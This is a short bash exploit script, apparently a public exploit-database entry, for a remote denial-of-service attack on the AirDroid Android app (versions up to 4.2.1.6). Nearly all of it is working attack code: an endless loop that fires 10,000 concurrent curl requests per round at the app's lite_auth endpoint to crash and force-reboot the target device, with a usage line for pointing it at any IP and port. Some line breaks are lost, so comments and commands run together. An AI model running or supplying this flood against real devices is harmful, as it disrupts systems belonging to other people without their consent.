#!/bin/bash# *********************************************************************# * Author: Marcelo Vázquez (aka s4vitar) *# *AirDroid Denial of Service (DoS) & System Crash + Forced Reboot*# *********************************************************************# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot# Date: 2019-02-13# Exploit Author: Marcelo Vázquez (aka s4vitar)# Collaborators: Victor Lasa (aka vowkin)# Vendor Homepage: https://web.airdroid.com/# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en# Version: <= AirDroid 4.2.1.6# Tested on: Android
url=$1# Example: http://192.168.1.46:8888
requests=0
trap ctrl_c INT
# If Ctrl+C key is pressed then the threads are killed
function ctrl_c(){
echo -e "\n\n[*]Exiting...\n"&& tput cnorm
pkill curl >/dev/null 2>&1
exit
}# Detect number of arguments being passed to the programif["$(echo $#)"=="1"]; then
# Infinite Loop
tput cnorm &&while true; do
# We send 10000 requests in threadfor i in $(seq 110000); do
curl --silent "$url/sdctl/comm/lite_auth/"&
let requests+=1
done && wait # Here we wait for the threads to finish
echo "Requests Sent: $requests"
done
else
echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n"
fi
